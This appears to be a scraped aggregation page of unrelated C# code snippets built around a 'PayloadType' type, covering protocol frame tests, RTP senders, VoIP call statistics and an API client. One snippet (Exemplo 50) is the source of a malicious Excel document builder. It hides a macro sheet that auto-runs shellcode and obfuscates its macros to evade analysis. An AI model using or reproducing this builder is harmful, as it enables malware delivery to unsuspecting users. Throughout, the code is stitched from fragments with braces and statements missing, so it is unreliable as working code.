            string trueValue  = Encoding.UTF8.GetString(frame.PopFirstValue("string_test"));

            Console.WriteLine("false : " + falseValue);
            Console.WriteLine("true : " + trueValue);
            Console.WriteLine(" ");

            // Testing CorruptedFrameException
            Console.WriteLine("Testing CorruptedFrameException:");
                byte[] frameContent = Encoding.UTF8.GetBytes("helo 00000000000 0000000410 foobar\nend\n");

                MemoryStream ns = new MemoryStream(frameContent);
            catch (CorruptedFrameException ex)
                // Successfull
                Console.WriteLine("thrown CorruptedFrameException");

            // Testing Reading Verifying Signing Key Pair Frame
            Console.WriteLine("Testing Reading Verifying Signing Key Pair Frame:");
            string vsString = "pute 0000000099 0000001337\n" + "kv testKey 9\n" + "testValue\n" + "kv blahbla2 10\n" + "blahblahb2\n" + "kv lawlKey 6\n" + "foobar\n" + "end\n";

            byte[]       vsBytes  = Encoding.UTF8.GetBytes(vsString);
            MemoryStream vsStream = new MemoryStream(vsBytes);
            Frame        csFrame  = Frame.ReadFromStream(vsStream);

            Console.WriteLine("Command: " + Command.PUT_ENTITY + " = " + csFrame.command);
            Console.WriteLine("Sequence number: " + "1337" + " = " + csFrame.sequenceNumber);
            Console.WriteLine("Number of VS key pais: " + "3" + " = " + csFrame.vsKeyPairs.Count);
            Console.WriteLine("Value from testKey: " + "testValue" + " = " + Encoding.UTF8.GetString(csFrame.PopFirstValue("testKey")));
            Console.WriteLine("Empty list: false" + " = " + csFrame.routingObjects.Any());

            //Testing Writing VSKeyPair
            Console.WriteLine("Testing Writing VSKeyPair:");
            FrameUtils writerUtils = new FrameUtils(Command.PUBLISH, 9876);

            writerUtils.AddVSKeyPairGetUtils("testKey1", "testValue1");
            writerUtils.AddVSKeyPairGetUtils("testKey2", "testValue2");
            Frame        writerFrame = writerUtils.Build();
            MemoryStream ns1         = new MemoryStream();
            Stream       bs1         = ns1;

            string frameRetreived   = Encoding.UTF8.GetString(ns1.ToArray());
            string expectedFrameStr = "publ 0000000000 0000009876\n" + "kv testKey1 10\n" + "testValue1\n" + "kv testKey2 10\n" + "testValue2\n" + "end\n";

            if (frameRetreived.Equals(expectedFrameStr))
                Console.WriteLine("Writing VSK test: They are equal.");

            //Testing Writing PayloadObject
            Console.WriteLine("Testing Writing PayloadObject:");
            FrameUtils    powriterUtils = new FrameUtils(Command.SUBSCRIBE, 1234);
            PayloadType   potype        = new PayloadType(42);
            PayloadObject poo           = new PayloadObject(potype, Encoding.UTF8.GetBytes("testPayload"));

            Frame        powriterFrame = powriterUtils.Build();
            MemoryStream ns2           = new MemoryStream();
            Stream       bs2           = ns2;

            string poframeRetreived   = Encoding.UTF8.GetString(ns2.ToArray());
            string poexpectedFrameStr = "subs 0000000000 0000001234\n" + "po :42 11\n" + "testPayload\n" + "end\n";

            if (poframeRetreived.Equals(poexpectedFrameStr))
                Console.WriteLine("Writing PO test: They are equal.");

            //Testing Writing RoutingObject
            Console.WriteLine("Testing Writing RoutingObject:");
            FrameUtils    rowriterUtils = new FrameUtils(Command.PUBLISH, 9876);
            RoutingObject ro            = new RoutingObject(45, Encoding.UTF8.GetBytes("relaxing"));

            Frame        rowriterFrame = rowriterUtils.Build();
            MemoryStream ns3           = new MemoryStream();
            Stream       bs3           = ns3;

            string roframeRetreived   = Encoding.UTF8.GetString(ns3.ToArray());
            string roexpectedFrameStr = "publ 0000000000 0000009876\n" + "ro 45 8\n" + "relaxing\n" + "end\n";

            if (roframeRetreived.Equals(roexpectedFrameStr))
                Console.WriteLine("Writing RO test: They are equal.");

            //Reading RoutingObject Frame
            Console.WriteLine("Testing Reading RoutingObject Frame:");
            string roframetoread = "dlpc 0000000987 0000000645\n" + "ro 255 6\n" + "testRO\n" + "end\n";

            byte[]       roframeBytes = Encoding.UTF8.GetBytes(roframetoread);
            MemoryStream roStream     = new MemoryStream(roframeBytes);
            Frame        roFrame      = Frame.ReadFromStream(roStream);

            Console.WriteLine("Command: " + Command.DEL_PREF_CHAIN + " = " + roFrame.command);
            Console.WriteLine("Sequence number: " + "645" + " = " + roFrame.sequenceNumber);
            Console.WriteLine("VSkeyPairCount: " + "0" + " = " + roFrame.vsKeyPairs.Count);
            Console.WriteLine("RoutinObjects.Count: 1" + " = " + roFrame.routingObjects.Count);
            Console.WriteLine("PayloadObjects.Count: 0" + " = " + roFrame.payloadObjects.Count);

            //Readin PayloadObject Frame
            Console.WriteLine("Testing Reading PayloadObject Frame:");
            string poframetoread = "make 0000000059 0000000999\n" + "po 11\n" + "testPayload\n" + "end\n";

            byte[]       poframeBytes = Encoding.UTF8.GetBytes(poframetoread);
            MemoryStream mempo        = new MemoryStream(poframeBytes);
            Frame        mepoframe    = Frame.ReadFromStream(mempo);

            Console.WriteLine("Command: " + Command.MAKE_ENTITY + " = " + mepoframe.command);
            Console.WriteLine("Sequence number: " + "999" + " = " + mepoframe.sequenceNumber);
            Console.WriteLine("VSkeyPairCount: " + "0" + " = " + mepoframe.vsKeyPairs.Count);
            Console.WriteLine("RoutinObjects.Count: 0" + " = " + mepoframe.routingObjects.Count);
            Console.WriteLine("PayloadObjects.Count: 1" + " = " + mepoframe.payloadObjects.Count);

            PayloadType expectedType = new PayloadType(new byte[] { 1, 2, 3, 4 });

            byte[]        expectedContents = Encoding.UTF8.GetBytes("testPayload");
            PayloadObject expectedPayload  = new PayloadObject(expectedType, expectedContents);

            if (expectedPayload.Equals(mepoframe.payloadObjects[0]))
                Console.WriteLine("Readin PO test: They are equal.");
Exemplo n.º 36
        //public byte[] EventPayload
        //    get
        //    {
        //        using (MemoryStream ms = new MemoryStream())
        //        {
        //            using (BinaryWriter writer = new BinaryWriter(ms))
        //            {
        //                this.Serialize(writer);
        //            }
        //            return ms.ToArray();
        //        }
        //    }

        //public static Payload CreateInstance(byte[] eventPayload)
        //    if (eventPayload.Length == 0)
        //    {
        //        throw new ArgumentException("Event payload is empty", "eventPayload");
        //    }

        //    PayloadType eventType = (PayloadType)eventPayload[0];

        //    Payload eventData = null;
        //    switch (eventType)
        //    {
        //        case PayloadType.CollectionOpened:
        //            eventData = new CollectionOpenedPayload(eventPayload);
        //            break;

        //        case PayloadType.ObjectOpened:
        //            eventData = new ObjectOpenedPayload(eventPayload);
        //            break;
        //        case PayloadType.ObjectDeleted:
        //            eventData = new ObjectDeletedPayload(eventPayload);
        //            break;

        //        case PayloadType.ObjectClosed:
        //            eventData = new ObjectClosedPayload(eventPayload);
        //            break;

        //        case PayloadType.ObjectConnected:
        //            eventData = new ObjectConnectedPayload(eventPayload);
        //            break;

        //        case PayloadType.CollectionDeleted:
        //            eventData = new CollectionDeletedPayload(eventPayload);
        //            break;

        //        case PayloadType.Object:
        //            eventData = new ObjectPayload(eventPayload);
        //            break;

        //        case PayloadType.ObjectInserted:
        //            eventData = new ObjectInsertedPayload(eventPayload);
        //            break;

        //        case PayloadType.ObjectRemoved:
        //            eventData = new ObjectRemovedPayload(eventPayload);
        //            break;

        //        case PayloadType.PropertyUpdated:
        //            eventData = new PropertyChangedPayload(eventPayload);
        //            break;

        //        case PayloadType.RegisterClient:
        //            eventData = new ClientConnectPayload(eventPayload);
        //            break;

        //        case PayloadType.RegisterPrincipal:
        //            eventData = new RegisterPrincipalPayload(eventPayload);
        //            break;

        //        case PayloadType.CollectionConnected:
        //            eventData = new CollectionConnectedPayload(eventPayload);
        //            break;

        //        case PayloadType.CollectionClosed:
        //            eventData = new CollectionClosedPayload(eventPayload);
        //            break;

        //        case PayloadType.SingletonInitialized:
        //            eventData = new SingletonInitializedPayload(eventPayload);
        //            break;

        //        case PayloadType.ObjectError:
        //            eventData = new ObjectErrorPayload(eventPayload);
        //            break;

        //        case PayloadType.ObjectPropertyError:
        //            eventData = new ObjectPropertyErrorPayload(eventPayload);
        //            break;

        //        case PayloadType.Error:
        //            eventData = new ErrorPayload(eventPayload);
        //            break;

        //        case PayloadType.Trace:
        //            eventData = new TracePayload(eventPayload);
        //            break;

        //        case PayloadType.ServerCommand:
        //            eventData = new ServerCommandPayload(eventPayload);
        //            break;

        //        case PayloadType.AtomicOperation:
        //            eventData = new AtomicPayload(eventPayload);
        //            break;

        //        case PayloadType.UnauthorizedError:
        //            eventData = new UnauthorizedErrorPayload(eventPayload);
        //            break;

        //        case PayloadType.ObjectSecurity:
        //            eventData = new SharedObjectSecurityPayload(eventPayload);
        //            break;

        //        case PayloadType.DirectMessage:
        //            eventData = new MessagePayload(eventPayload);
        //            break;

        //        case PayloadType.CollectionHeartbeat:
        //            eventData = new CollectionHeartbeatPayload(eventPayload);
        //            break;

        //        case PayloadType.EvictionPolicy:
        //            eventData = new EvictionPolicyPayload(eventPayload);
        //            break;

        //        default:
        //            throw new InvalidOperationException("Unknown EventLinkDataType");

        //    }

        //    return eventData;

        //private ushort GenerateId()
        //    ushort id = payloadSequenceId;
        //    payloadSequenceId++;
        //    // The max value is reserved for internal constructors to specify to the payload constructor
        //    // that they want an auto generated payload id, so we skip over that number in the sequence
        //    if (payloadSequenceId == ushort.MaxValue)
        //    {
        //        payloadSequenceId = 0;
        //    }
        //    return id;

        /// <summary>
        /// Used by serializer
        /// </summary>
        //public Payload2()
        //    : this(PayloadType.Undetermined)

        public Payload2(PayloadType eventType)
            this.EventType = eventType;
            //this.PayloadId = GenerateId();
Exemplo n.º 37
 public PayloadChannel(PayloadType pType)
     fPayloadType = pType;
Exemplo n.º 38
 public Payload(string content)
     _strContent = content;
     _type       = PayloadType.String;
     _size       = content.Length;
Exemplo n.º 39
 public static String payloadHeader(PayloadType type)
     switch (type) {
     case PayloadType.Altitude:
         return "ALT";
     case PayloadType.Apoapsis:
         return "APA";
     case PayloadType.Apoapsis_r:
         return "APR";
     case PayloadType.Orb_spd:
         return "OSP";
     case PayloadType.Periapsis:
         return "PEA";
     case PayloadType.Periapsis_r:
         return "PER";
     case PayloadType.Stage:
         return "STG";
     case PayloadType.Surf_spd:
         return "SSP";
     case PayloadType.T_t_apo:
         return "TTA";
     case PayloadType.T_t_peri:
         return "TTP";
     case PayloadType.Targ_dist:
         return "TDI";
     case PayloadType.Targ_spd:
         return "TSP";
     case PayloadType.SOI_Num:
         return "SOI";
     case PayloadType.Latitude:
         return "LAT";
     case PayloadType.Longitude:
         return "LON";
     case PayloadType.Orbital_period:
         return "OPE";
     case PayloadType.Gee_force:
         return "GFO";
     case PayloadType.Terrain_altitude:
         return "AGL";
         return "INV";
Exemplo n.º 40
 public Payload(FileStream file)
     _fileContent = file;
     _type        = PayloadType.File;
     _size        = file.Length;
        /// <summary>
        /// Get whether the individual property is a single primitive type.
        /// </summary>
        /// <param name="responsePayload">the string of the response payload.</param>
        /// <param name="payloadType">the type of the response payload.</param>
        /// <returns>True, if the the individual property is a single primitive type; false otherwise. </returns>
        public static bool IsIndividualPropertySinglePrimitiveType(
            string responsePayload, PayloadType payloadType)
            if (payloadType != PayloadType.IndividualProperty || string.IsNullOrEmpty(responsePayload))
                return false;

            XmlDocument xmlDoc = new XmlDocument();
            XmlElement root = xmlDoc.DocumentElement;

            if (root.LocalName.Equals("value") && root.NamespaceURI.Equals(Constants.NSMetadata))
                if (root.Attributes["context", Constants.NSMetadata] != null)
                    string contextURI = root.Attributes["context", Constants.NSMetadata].Value;
                    string propertyType = contextURI.Remove(0, contextURI.IndexOf('#') + 1);

                    if (propertyType.Contains("Collection("))
                        return false;

                if (root.Attributes["type", Constants.NSMetadata] != null)
                    string typeName = root.Attributes["type", Constants.NSMetadata].Value;
                    if (!typeName.Contains("."))
                        typeName = "Edm." + typeName;

                    if (EdmTypeManager.IsEdmSimpleType(typeName))
                        return true;
                    return true;

            return false;
Exemplo n.º 42
        internal static Frame MessageToFrame(ulong conversationId, string methodName, PayloadType type, IMessage payload, IBonded layerData, Logger logger)
            var frame = new Frame(logger);

                var headers = new EpoxyHeaders
                    conversation_id = conversationId,
                    payload_type    = type,
                    method_name     = methodName ?? string.Empty, // method_name is not nullable

                if (payload.IsError)
                    headers.error_code = payload.Error.Deserialize <Error>().error_code;
                    headers.error_code = (int)ErrorCode.OK;

                const int initialHeaderBufferSize = 150;
                var       outputBuffer            = new OutputBuffer(initialHeaderBufferSize);
                var       fastWriter = new FastBinaryWriter <OutputBuffer>(outputBuffer);
                Serialize.To(fastWriter, headers);

                frame.Add(new Framelet(FrameletType.EpoxyHeaders, outputBuffer.Data));

            if (layerData != null)
                const int initialLayerDataBufferSize = 150;
                var       outputBuffer  = new OutputBuffer(initialLayerDataBufferSize);
                var       compactWriter = new CompactBinaryWriter <OutputBuffer>(outputBuffer);
                // TODO: See TODO below about issues with IBonded Marshal.TO(...)
                frame.Add(new Framelet(FrameletType.LayerData, outputBuffer.Data));

                var userData = payload.IsError ? (IBonded)payload.Error : (IBonded)payload.RawPayload;

                const int initialPayloadBufferSize = 1024;
                var       outputBuffer             = new OutputBuffer(initialPayloadBufferSize);
                var       compactWriter            = new CompactBinaryWriter <OutputBuffer>(outputBuffer);
                // TODO: marshal dies on IBonded Marshal.To(compactWriter, request)
                // understand more deeply why and consider fixing

                frame.Add(new Framelet(FrameletType.PayloadData, outputBuffer.Data));

Exemplo n.º 43
        internal RtpSender(IRtpSession rtpSession, string name, PayloadType payloadType, Hashtable priExns, Hashtable paraPay)
            if(Thread.CurrentThread.Name == null)
                Thread.CurrentThread.Name = "RtpSender - " + name;

            this.rtpSession = rtpSession;
            this.payloadType = payloadType;
            this.payloadPara = paraPay;

            // Leave everything but CName and Name blank in order to reduce Rtcp bandwidth
            sdes = new SdesData(rtpSession.Sdes.CName, name);

            // Add private extensions
            sdes.SetPrivateExtension(Rtcp.PEP_SOURCE, Rtcp.PED_STREAM);
            sdes.SetPrivateExtension(Rtcp.PEP_PAYLOADTYPE, ((int)payloadType).ToString());


            // This needs to be called after InitializeNetwork
            if( priExns != null )
                foreach(DictionaryEntry de in priExns)
                    sdes.SetPrivateExtension((string)de.Key, (string)de.Value);

                string dbpString = (string)priExns[Rtcp.PEP_DBP];
                if( dbpString != null )
                    DelayBetweenPackets = short.Parse(dbpString);

Exemplo n.º 44
        /*private void cm_ContactFound(object sender, ContactFoundEventArgs e)
         * {
         *  if (e.ContactFound != null)
         *  {
         *      Contact.Text = e.ContactFound.DisplayName;
         *      if (e.PhoneLabel != null)
         *      {
         *          Number.Text = e.PhoneLabel + " : " + e.PhoneNumber;
         *      }
         *      else
         *      {
         *          Number.Text = e.PhoneNumber;
         *      }
         *  }
         * }*/

        private void timerTick(Object sender, Object e)
            Call call = ((InCallModel)this.DataContext).GetCurrentCall();

            if (call == null)

            //startTime = (DateTimeOffset)call.CallStartTimeFromContext;

            TimeSpan callDuration = new TimeSpan(call.Duration * TimeSpan.TicksPerSecond);
            var      hh           = callDuration.Hours;
            var      ss           = callDuration.Seconds;
            var      mm           = callDuration.Minutes;

            Status.Text = hh.ToString("00") + ":" + mm.ToString("00") + ":" + ss.ToString("00");

            string audioPayloadType       = "";
            string audioDownloadBandwidth = "";
            string audioUploadBandwidth   = "";
            string videoPayloadType       = "";
            string videoDownloadBandwidth = "";
            string videoUploadBandwidth   = "";

            CallParams param = call.CurrentParams;

            ((InCallModel)this.DataContext).MediaEncryption = param.MediaEncryption.ToString();

            CallStats audioStats = null;

            try {
                audioStats = call.GetStats(StreamType.Audio);
            } catch { }

            if (audioStats != null)
                audioDownloadBandwidth = String.Format("{0:0.00}", audioStats.DownloadBandwidth);
                audioUploadBandwidth   = String.Format("{0:0.00}", audioStats.UploadBandwidth);
                ((InCallModel)this.DataContext).ICE = audioStats.IceState.ToString();

            PayloadType audiopt = param.UsedAudioPayloadType;

            if (audiopt != null)
                audioPayloadType = audiopt.MimeType + "/" + audiopt.ClockRate;

            if (param.VideoEnabled)
                CallStats videoStats = call.GetStats(StreamType.Video);
                if (videoStats != null)
                    videoDownloadBandwidth = String.Format("{0:0.00}", videoStats.DownloadBandwidth);
                    videoUploadBandwidth   = String.Format("{0:0.00}", videoStats.UploadBandwidth);

                PayloadType videopt = param.UsedVideoPayloadType;
                if (videopt != null)
                    videoPayloadType = videopt.MimeType;
                VideoDefinition receivedVideoSize    = param.ReceivedVideoDefinition;
                String          NewReceivedVideoSize = String.Format("{0}x{1}", receivedVideoSize.Width, receivedVideoSize.Height);
                String          OldReceivedVideoSize = ((InCallModel)this.DataContext).ReceivedVideoSize;
                if (OldReceivedVideoSize != NewReceivedVideoSize)
                    ((InCallModel)this.DataContext).ReceivedVideoSize = String.Format("{0}x{1}", receivedVideoSize.Width, receivedVideoSize.Height);
                    ((InCallModel)this.DataContext).IsVideoActive     = false;
                    if (NewReceivedVideoSize != "0x0")
                        ((InCallModel)this.DataContext).IsVideoActive = true;
                VideoDefinition sentVideoSize = param.SentVideoDefinition;
                ((InCallModel)this.DataContext).SentVideoSize        = String.Format("{0}x{1}", sentVideoSize.Width, sentVideoSize.Height);
                ((InCallModel)this.DataContext).VideoStatsVisibility = Visibility.Visible;
                ((InCallModel)this.DataContext).VideoStatsVisibility = Visibility.Collapsed;

            string downloadBandwidth = audioDownloadBandwidth;

            if ((downloadBandwidth != "") && (videoDownloadBandwidth != ""))
                downloadBandwidth += " - ";
            if (videoDownloadBandwidth != "")
                downloadBandwidth += videoDownloadBandwidth;
            ((InCallModel)this.DataContext).DownBandwidth = String.Format("{0} kb/s", downloadBandwidth);
            string uploadBandwidth = audioUploadBandwidth;

            if ((uploadBandwidth != "") && (videoUploadBandwidth != ""))
                uploadBandwidth += " - ";
            if (videoUploadBandwidth != "")
                uploadBandwidth += videoUploadBandwidth;
            ((InCallModel)this.DataContext).UpBandwidth = String.Format("{0} kb/s", uploadBandwidth);
            string payloadType = audioPayloadType;

            if ((payloadType != "") && (videoPayloadType != ""))
                payloadType += " - ";
            if (videoPayloadType != "")
                payloadType += videoPayloadType;
            ((InCallModel)this.DataContext).PayloadType = payloadType;
Exemplo n.º 45
 internal RtpSenderFec(IRtpSession session, string name, PayloadType pt, Hashtable priExns, Hashtable paraPay)
     base(session, name, pt, priExns, paraPay) {}
Exemplo n.º 46
 internal static extern ErrorCode CionPayloadCreate(out PayloadSafeHandle payload, PayloadType type);
Exemplo n.º 47
        internal static RtpSender CreateInstance(IRtpSession session, string name, PayloadType pt, 
            Hashtable priExns, ushort cDataPx, ushort cFecPx)
            // Validate before adding to private extensions
            if(cFecPx == 0)
                throw new ArgumentOutOfRangeException("cFecPx", cFecPx, "Must be >= 1");

            // Add the relevant private extension for FEC
            Hashtable fecExns = null;
            if(priExns != null)
                fecExns = (Hashtable)priExns.Clone();
                fecExns = new Hashtable();

            fecExns[Rtcp.PEP_FEC] = cDataPx.ToString() + ":" + cFecPx.ToString();

            // Call generic class factory
            return CreateInstance(session, name, pt, fecExns, null);
Exemplo n.º 48
 internal static extern ErrorCode CionPayloadGetType(IntPtr payload, out PayloadType type);
Exemplo n.º 49
        /// <summary>
        /// Creates a basic RtpSender
        /// This RtpSender simply sends data over the wire.  It uses the least amount of CPU and
        /// network bandwidth at the cost of reliability (i.e. it makes no attempts to improve data
        /// arrival at the remote site).
        /// </summary>
        /// <param name="Name">string Friendly Name of the device/sender of this RtpStream</param>
        /// <param name="payloadType">Rtp Payload Type</param>
        /// <param name="priExns">Private extensions for this RtpSender/Stream</param>
        public RtpSender CreateRtpSender(string name, PayloadType pt, Hashtable priExns)

            RtpSender rtpSender = RtpSender.CreateInstance(this, name, pt, priExns);

            return rtpSender;
Exemplo n.º 50
        /// <summary>
        /// Generate an Excel Document with a hidden macro sheet that will execute code described by the payload argument.
        /// </summary>
        /// <param name="decoyDocument">File path to the base Excel 2003 sheet that should be visible to users.</param>
        /// <param name="payload">Either binary shellcode or a newline separated list of Excel Macros to execute</param>
        /// <param name="payload64Bit">Binary shellcode of a 64bit payload, payload-type must be Shellcode</param>
        /// <param name="payloadType">Specify if the payload is binary shellcode or a macro list. Defaults to Shellcode</param>
        /// <param name="preamble">Preamble macro code to include with binary shellcode payload type</param>
        /// <param name="macroSheetName">The name that should be used for the macro sheet. Defaults to Sheet2</param>
        /// <param name="outputFileName">The output filename used for the generated document. Defaults to output.xls</param>
        /// <param name="debugMode">Set this to true to make the program wait for a debugger to attach. Defaults to false</param>
        /// <param name="payloadMethod">How should shellcode be written in the document. Defaults to using the SheetPackingMethod for encoding.</param>
        /// <param name="password">Password to encrypt document using XOR Obfuscation.</param>
        /// <param name="method">Which method to use for obfuscating macros. Defaults to ObfuscatedCharFunc. </param>
        /// <param name="localizedLabel">Use this flag in order to set a localized label in case Excel is not in US language. Default to Auto_Open</param>
        public static void Build(FileInfo decoyDocument, FileInfo payload, FileInfo payload64Bit, string preamble,
                                 PayloadType payloadType   = PayloadType.Shellcode,
                                 string macroSheetName     = "Sheet2", string outputFileName = "output.xls", bool debugMode = false,
                                 SheetPackingMethod method = SheetPackingMethod.ObfuscatedCharFunc, PayloadPackingMethod payloadMethod = PayloadPackingMethod.MatchSheetPackingMethod,
                                 string password           = "", string localizedLabel = "Auto_Open")
            if (decoyDocument == null || payload == null)
                Console.WriteLine("decoy-document and payload must be specified in Build mode. Run build -h for usage instructions.");

            //Useful for remote debugging
            if (debugMode)
                Console.WriteLine("Waiting for debugger to attach");
                while (!Debugger.IsAttached)
                Console.WriteLine("Debugger attached");

            List <BiffRecord> defaultMacroSheetRecords = GetDefaultMacroSheetRecords();

            string decoyDocPath = decoyDocument.FullName;

            WorkbookStream wbs        = LoadDecoyDocument(decoyDocPath);
            List <string>  sheetNames = wbs.GetAllRecordsByType <BoundSheet8>().Select(bs => bs.stName.Value).ToList();
            VBAInfo        vbaInfo    = VBAInfo.FromCompoundFilePath(decoyDocPath, sheetNames);

            List <string> preambleCode = new List <string>();

            if (preamble != null)
                string preambleCodePath = new FileInfo(preamble).FullName;
                preambleCode = new List <string>(File.ReadAllLines(preambleCodePath));

            WorkbookEditor wbe = new WorkbookEditor(wbs);

            wbe.AddMacroSheet(defaultMacroSheetRecords, macroSheetName, BoundSheet8.HiddenState.SuperHidden);

            List <string> macros = null;

            byte[] binaryPayload   = null;
            byte[] binary64Payload = null;

            //TODO make this customizable
            int rwStart     = 0;
            int colStart    = 0xA0;
            int dstRwStart  = 0;
            int dstColStart = 0;

            int curRw  = rwStart;
            int curCol = colStart;

            switch (payloadType)
            case PayloadType.Shellcode:
                macros        = MacroPatterns.GetX86GetBinaryLoaderPattern(preambleCode, macroSheetName);
                binaryPayload = File.ReadAllBytes(payload.FullName);

                if (payload64Bit != null && payload64Bit.Exists)
                    binary64Payload = File.ReadAllBytes(payload64Bit.FullName);


            case PayloadType.Macro:
                macros = MacroPatterns.ImportMacroPattern(File.ReadAllLines(payload.FullName).ToList());
                //Prepend the preamble to the imported pattern
                macros = preambleCode.Concat(macros).ToList();

                throw new ArgumentException(string.Format("Invalid PayloadType {0}", payloadType),

            if (binaryPayload != null && binaryPayload.Length > 0)
                if (payloadMethod == PayloadPackingMethod.Base64)
                    wbe.SetMacroBinaryContent(binaryPayload, 0, dstColStart + 1, 0, 0, method, payloadMethod);
                    wbe.SetMacroBinaryContent(binaryPayload, curRw, curCol, dstRwStart, dstColStart + 1, method);

                curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1;

                if (rwStart > 0xE000)
                    curRw   = 0;
                    curCol += 1;

                if (binary64Payload != null && binary64Payload.Length > 0)
                    if (payloadMethod == PayloadPackingMethod.Base64)
                        wbe.SetMacroBinaryContent(binary64Payload, 0, dstColStart + 2, 0, 0, method, payloadMethod);
                        wbe.SetMacroBinaryContent(binary64Payload, curRw, curCol, dstRwStart, dstColStart + 2, method);

                    curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1;

                    if (rwStart > 0xE000)
                        curRw   = 0;
                        curCol += 1;

                    macros = MacroPatterns.GetMultiPlatformBinaryPattern(preambleCode, macroSheetName);

                if (payloadMethod == PayloadPackingMethod.Base64)
                    macros = MacroPatterns.GetBase64DecodePattern(preambleCode);

            wbe.SetMacroSheetContent(macros, curRw, curCol, dstRwStart, dstColStart, method);

            // Initialize the Global Stream records like SupBook + ExternSheet

            if (method == SheetPackingMethod.CharSubroutine || method == SheetPackingMethod.AntiAnalysisCharSubroutine)
                ushort charInvocationRw  = 0xefff;
                ushort charInvocationCol = 0x9f;
                wbe.AddLabel("\u0000", charInvocationRw, charInvocationCol, true, true);

                //Abuse a few comparison "features" in Excel
                //1. Null bytes are ignored at the beginning and start of a label.
                //2. Comparisons are not case sensitive, A vs a or Ḁ vs ḁ
                //3. Unicode strings can be "decomposed" - ex: Ḁ (U+1E00) can become A (U+0041) - ◌̥ (U+0325)
                //4. The Combining Grapheme Joiner (U+034F) unicode symbol is ignored at any location in the string in SET.NAME functions
                wbe.AddLabel(UnicodeHelper.UnicodeArgumentLabel, null, true, true);
                //Using lblIndex 2, since that what var has set for us
                    FormulaHelper.CreateCharInvocationFormulaForLblIndex(charInvocationRw, charInvocationCol, 2), payloadMethod);
            else if (method == SheetPackingMethod.ArgumentSubroutines)
                ushort charInvocationRw  = 0xefff;
                ushort charInvocationCol = 0x9f;

                ushort formInvocationRw  = 0xefff;
                ushort formInvocationCol = 0x9e;

                ushort evalFormInvocationRw  = 0xefff;
                ushort evalFormInvocationCol = 0x9d;

                wbe.AddLabel("c", charInvocationRw, charInvocationCol, false, false);
                wbe.AddLabel("f", formInvocationRw, formInvocationCol, false, false);

                wbe.AddLabel(UnicodeHelper.CharFuncArgument1Label, null, false, true);
                wbe.AddLabel(UnicodeHelper.FormulaFuncArgument1Label, null, false, true);
                wbe.AddLabel(UnicodeHelper.FormulaFuncArgument2Label, null, false, true);

                wbe.AddLabel("e", evalFormInvocationRw, evalFormInvocationCol, false, false);
                wbe.AddLabel(UnicodeHelper.FormulaEvalArgument1Label, null, false, true);

                List <Formula> charFunctionFormulas =
                    FormulaHelper.CreateCharFunctionWithArgsForLbl(charInvocationRw, charInvocationCol, 3,
                foreach (var f in charFunctionFormulas)
                    wbe.AddFormula(f, payloadMethod);

                List <Formula> formulaFunctionFormulas = FormulaHelper.CreateFormulaInvocationFormulaForLblIndexes(
                    formInvocationRw, formInvocationCol, UnicodeHelper.FormulaFuncArgument1Label,
                    UnicodeHelper.FormulaFuncArgument2Label, 4, 5);
                foreach (var f in formulaFunctionFormulas)
                    wbe.AddFormula(f, payloadMethod);

                List <Formula> formulaEvalFunctionFormulas =
                        evalFormInvocationRw, evalFormInvocationCol,
                        UnicodeHelper.FormulaEvalArgument1Label, 7);
                foreach (var f in formulaEvalFunctionFormulas)
                    wbe.AddFormula(f, payloadMethod);

            wbe.AddLabel(localizedLabel, rwStart, colStart);


            WorkbookStream createdWorkbook = wbe.WbStream;

            if (!string.IsNullOrEmpty(password))
                Console.WriteLine("Encrypting Document with Password " + password);
                XorObfuscation xorObfuscation = new XorObfuscation();
                createdWorkbook = xorObfuscation.EncryptWorkbookStream(createdWorkbook, password);
                // createdWorkbook = createdWorkbook.FixBoundSheetOffsets();

            ExcelDocWriter writer     = new ExcelDocWriter();
            string         outputPath = AssemblyDirectory + Path.DirectorySeparatorChar + outputFileName;

            Console.WriteLine("Writing generated document to {0}", outputPath);
            writer.WriteDocument(outputPath, createdWorkbook, vbaInfo);
Exemplo n.º 51
 public virtual void RemoveCompressor(PayloadType payload)
Exemplo n.º 52
 public virtual void RemoveCompressor(PayloadType payload)
Exemplo n.º 53
 public virtual void RemoveRenderer(PayloadType payload)
Exemplo n.º 54
        /// <summary>
        /// Core implementation of processMethod. Retrieves a generic type.
        /// </summary>
        /// <typeparam name="T">Generic type that will return.</typeparam>
        /// <param name="clazz">Type of Class we are using.</param>
        /// <param name="resource">Resource we will use and return in the implementation.</param>
        /// <param name="methodName">The name of the method  we are trying to call.</param>
        /// <param name="parameters">Parameters to use in the process.</param>
        /// <param name="useCache">Cache configuration.</param>
        /// <param name="requestOptions">Object containing the request options.</param>
        /// <returns>Generic type object, containing information about retrieval process.</returns>
        protected static T ProcessMethod <T>(Type clazz, T resource, string methodName, Dictionary <string, string> parameters, bool useCache, MPRequestOptions requestOptions) where T : MPBase
            if (resource == null)
                    resource = (T)Activator.CreateInstance(clazz);
                catch (Exception ex)
                    throw new MPException(ex.Message);

            var         clazzMethod = GetAnnotatedMethod(clazz, methodName);
            var         restData    = GetRestInformation(clazzMethod);
            HttpMethod  httpMethod  = (HttpMethod)restData["method"];
            PayloadType payloadType = (PayloadType)restData["payloadType"];
            JObject     payload     = GeneratePayload(httpMethod, resource);

            if (requestOptions == null)
                int requestTimeout = (int)restData["requestTimeout"];
                int retries        = (int)restData["retries"];
                requestOptions = new MPRequestOptions
                    Retries = retries,
                    Timeout = requestTimeout

            string        path     = ParsePath(restData["path"].ToString(), parameters, resource, requestOptions);
            MPAPIResponse response = CallAPI(httpMethod, path, payloadType, payload, useCache, requestOptions);

            if (response.StatusCode >= 200 && response.StatusCode < 300)
                if (httpMethod != HttpMethod.DELETE)
                    resource = (T)FillResourceWithResponseData(resource, response);
                    resource._lastApiResponse = response;
                    resource = null;
            else if (response.StatusCode >= 400 && response.StatusCode < 500)
                BadParamsError badParamsError = MPCoreUtils.GetBadParamsError(response.StringResponse);
                resource.Errors = badParamsError;
                MPException webserverError = new MPException()
                    StatusCode   = response.StatusCode,
                    ErrorMessage = response.StringResponse
                throw webserverError;

Exemplo n.º 55
 /// <summary>
 /// Remove everything downstream from the DVSplitter for the specified payload type
 /// </summary>
 /// <param name="payload"></param>
 public override void RemoveCompressor(PayloadType payload)
Exemplo n.º 56
        /// <summary>
        /// Create a request to use in the call to a certain endpoint.
        /// </summary>
        /// <returns>Api response with the result of the call.</returns>
        public MPRequest CreateRequest(HttpMethod httpMethod,
            string path,
            PayloadType payloadType,
            JObject payload,
            MPRequestOptions requestOptions)

            if (string.IsNullOrEmpty(path))
                throw new MPRESTException("Uri can not be an empty string.");

